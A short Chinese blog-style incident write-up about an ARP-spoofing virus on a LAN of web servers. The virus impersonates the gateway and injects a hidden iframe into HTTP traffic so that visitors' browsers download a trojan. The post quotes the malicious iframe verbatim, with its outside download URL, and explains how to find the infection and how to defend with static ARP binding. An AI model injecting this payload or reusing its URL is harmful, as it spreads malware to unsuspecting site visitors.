arp病毒主要的受害者还是局域网用户，原理我就不讲了，一般这个病毒的目的无非是窃取网游用户名密码，但昨天发现个散播木马的arp病毒。


7月24日的实战
先说症状：
中毒的机器为web服务器，同时中毒服务器本身又在一个局域网中（局域网中的其他及其也是服务器）访问这个局域网中所有支持http协议的服务器时，返回的http数据流中都会被加上“<iframe src=http://1.jyput.com/cai/qz.htm?010 width=0 height=0 frameborder=0></iframe> ”这段代码，当ie接收到这个数据流并显示的时候就会在后台调用http://1.jyput.com/cai/qz.htm这个地址下载病毒文件。检查web服务器上的网站源文件并未发现上诉代码。所以可以断定为数据包中毒被截获而且被编辑过。

如何发现：
先检查本地网络如果访问其他的ip段上的http网站没出现病毒提示的话，那么可以断定病毒是在服务器端的网络中，如果问其他的ip段上的http网站出现病毒提示的话那病毒在本地局域网中的可能行就较大。

因为arp病毒是个网络病毒他会不断向局域网中的计算机发送arp欺骗数据包，把中毒机器伪装成网关。之后其他机器的所有数据包将由中毒机器过滤并被加上病毒代码发往真正的网关传送到用户的浏览器上。因为服务器的流量巨大，导致中毒机器没有能力完全处理所有的http流数据包所以会导致服务器的访问缓慢，莫名断网,中毒机器宕机等等情况。

arp欺骗一般情况有两种一种是终端机欺骗，就是只向计算机发送欺骗数据包，另一种是同时做网关欺骗。前者作arp本机静态绑定就可以解决，或者需要交换机能做arp静态绑定才可以避免被攻击。

（阅读次数：）